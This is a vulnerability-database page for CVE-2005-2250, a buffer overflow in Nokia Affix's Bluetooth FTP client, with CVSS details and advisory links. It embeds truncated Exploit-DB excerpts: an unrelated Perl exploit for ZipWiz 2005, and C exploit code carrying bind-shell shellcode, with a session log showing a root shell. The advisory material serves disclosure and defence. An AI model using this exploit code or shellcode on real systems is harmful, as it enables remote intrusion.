CVE-2005-2250
published 2005-07-13
CVE-2005-2250: Buffer overflow in Bluetooth FTP client (BTFTP) in Nokia Affix 2.1.2 and 3.2.0 allows remote attackers to execute arbitrary code via a long filename in an OBEX…
Priority P337 | high | 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 10.30% (95.1th percentile)
Buffer overflow in Bluetooth FTP client (BTFTP) in Nokia Affix 2.1.2 and 3.2.0 allows remote attackers to execute arbitrary code via a long filename in an OBEX file share.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nokia | affix | — | — |
| nokia | affix | — | — |
| nokia | affix | — | — |
| nokia | affix | — | — |
| nokia | affix | — | — |
| nokia | affix | — | — |
| nokia | affix | — | — |
| nokia | affix | — | — |
| nokia | affix | — | — |
| nokia | affix | — | — |
No detection rules found.
Exploit-DB
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
exploitdb·2011-07-08
---
#!/usr/bin/perl
#
#[+]Exploit Title: ZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit
#[+]Date: 08\07\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/ZipWiz-2005/3000-2250_4-10011590.html
#[+]Version: v5.0
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
use strict;
use warnings;
my $filename = "Exploit.zip";
print "\n\n\t\tZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit\n";
print "\t\tCreated by C4SS!0 G0M3S\n";
print "\t\tE-mail Louredo_\@hotmail.com\n";
print "\t\tSite www.exploit-br.org/\n\n";
sleep(1);
my $head = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";
my $head2 = "\x50\x4B\x01\x02
Exploit-DB
Nokia Affix < 3.2.0 - btftp Remote Client
exploitdb·2005-07-03
CVE-2005-2250 Nokia Affix < 3.2.0 - btftp Remote Client
Nokia Affix open 00:04:3e:65:a1:c8
Connected.
ftp> ls
Z8Á¾ýÞ)á½Tnb 6 uûÿ¿uûÿ¿3ÉéëèÿÿÿÿÀ^vî0^îüâô¨5?Ê24ÿ¶©×?#°ÈÚ¼V6²V
Ϲ¿)ýÞ
ýÞÑýÞÐÉî¼Xq¶X6¶Y0
root@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444
Trying 192.168.1.207...
Connected to 192.168.1.207.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
hostname;
threat
: command not found
*/
#include
#include
main()
{
FILE *malfile;
/* linux_ia32_bind - LPORT=4444 Size=108 Encoder=Pex http://metasploit.com */
unsigned char scode[] =
"\x33\xc9\x83\xe9\xeb\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x99"
"\xee\x30\x5e\x83\xee\xfc\xe2\xf4\xa8\x35\x63\x1d\xca\x84\x32\x34"
"\xff\xb6\xa9\xd7\x78\x23\xb0\xc8\xda\xbc\x56\x36\x88\xb2\x56\x0d"
"\x10\x0f\x5a\x38\xc1\xbe\x61\x08\x10\x0f\xfd\xde\x29\x88\xe1\x
No writeups or analysis indexed.
http://affix.sourceforge.net/affix_212_sec.patch
http://www.debian.org/security/2005/dsa-762
http://www.digitalmunition.com/DMA%5B2005-0712a%5D.txt
http://www.securityfocus.com/bid/14230
Published: 2005-07-13